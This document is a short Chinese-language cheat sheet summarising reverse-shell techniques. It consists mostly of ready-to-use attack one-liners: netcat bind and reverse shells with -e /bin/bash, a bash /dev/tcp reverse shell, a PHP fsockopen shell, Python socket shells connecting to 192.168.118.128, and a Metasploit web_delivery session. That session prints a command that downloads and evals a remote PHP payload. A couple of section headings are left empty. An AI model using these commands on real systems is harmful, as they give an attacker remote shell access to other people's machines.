反彈Shell小結

一、NC反彈shell

1.一、正向反彈shell

服務器

nc -lvvp 7777 -e /bin/bash

攻擊機

nc  server-ip 7777 

 

1.二、反向反彈shell

攻擊機

nc -lvvp 7777

 

服務器

nc -e /bin/bash Client-ip 7777 

 

1.三、不帶-e反彈：

二、 bash反彈shell

2.1 bash -i 

攻擊機

nc -lvvp 7777

 

服務器

bash -i >& /dev/tcp/Client-IP/7777 0>&1

三、PHP反彈shell

3.1  php -r

php -r '$sock=fsockopen("192.168.118.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

進行url編碼：

四、python反彈

4.一、python -c

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.118.128",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.118.128",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

五、metasploit

5.一、web_delivery

use exploit/multi/script/web_delivery 

msf > use exploit/multi/script/web_delivery 
msf exploit(web_delivery) > set target 1 
target => 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.118.128
lhost => 192.168.118.128
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set SRVPORT  8888
SRVPORT => 8888
msf exploit(web_delivery) > run 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.118.128:6666 
[*] Using URL: http://0.0.0.0:8888/mDIK5UGRA8Qs76
[*] Local IP: http://192.168.118.128:8888/mDIK5UGRA8Qs76
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.118.128:8888/mDIK5UGRA8Qs76'));"